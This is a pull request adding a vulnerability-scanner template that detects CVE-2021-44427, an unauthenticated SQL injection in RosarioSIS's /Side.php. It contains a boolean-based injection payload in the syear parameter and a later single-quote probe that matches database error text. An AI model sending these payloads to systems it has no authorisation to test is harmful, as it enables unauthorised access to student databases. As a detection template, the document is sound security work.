### PR TITLE
Create  CVE-2021-44427.yaml

### DIFF
--- a/cves/2021/CVE-2021-44427.yaml
+++ b/cves/2021/CVE-2021-44427.yaml
@@ -2,29 +2,37 @@ id: CVE-2021-44427
 
 info:
   name: Rosario Student Information System Unauthenticated SQL Injection
-  author: furkansayim | xShuden
+  author: furkansayim,xShuden
   severity: critical
+  description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
   reference:
     - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
-    - https://alerts.remotelyrmm.com/CVE-2021-44427
     - https://twitter.com/RemotelyAlerts/status/1465697928178122775
-  tags: cve,cve2021,sql
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44427
+  tags: cve,cve2021,sqli,rosariosis
 
 requests:
   - method: POST
     path:
-      - "{{BaseURL}}/rosariosis-v8.1/Side.php"
-
-    body: "sidefunc=update&syear=111'+OR+NOT+6920=6920-- elyQ"
+      - "{{BaseURL}}/Side.php"
+    body: "sidefunc=update&syear=111'"
+    headers:
+      Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
     matchers-condition: and
     matchers:
-
       - type: word
+        part: body
         words:
-          - "text/html"
-        part: header
+          - "DB Execute Failed. ERROR:"
+          - "unterminated quoted string"
+        condition: and
 
       - type: status
         status:
           - 200
+
+      - type: word
+        part: header
+        words:
+          - "RosarioSIS="

--- a/cves/2021/CVE-2021-44427.yaml
+++ b/cves/2021/CVE-2021-44427.yaml
@@ -1,0 +1,30 @@
+id: CVE-2021-44427
+
+info:
+  name: Rosario Student Information System Unauthenticated SQL Injection
+  author: furkansayim | xShuden
+  severity: critical
+  reference:
+    - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
+    - https://alerts.remotelyrmm.com/CVE-2021-44427
+    - https://twitter.com/RemotelyAlerts/status/1465697928178122775
+  tags: cve,cve2021,sql
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/rosariosis-v8.1/Side.php"
+
+    body: "sidefunc=update&syear=111'+OR+NOT+6920=6920-- elyQ"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Added CVE-2021-44427

`An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.`

- References:
     - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
    - https://alerts.remotelyrmm.com/CVE-2021-44427
    - https://twitter.com/RemotelyAlerts/status/1465697928178122775

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO
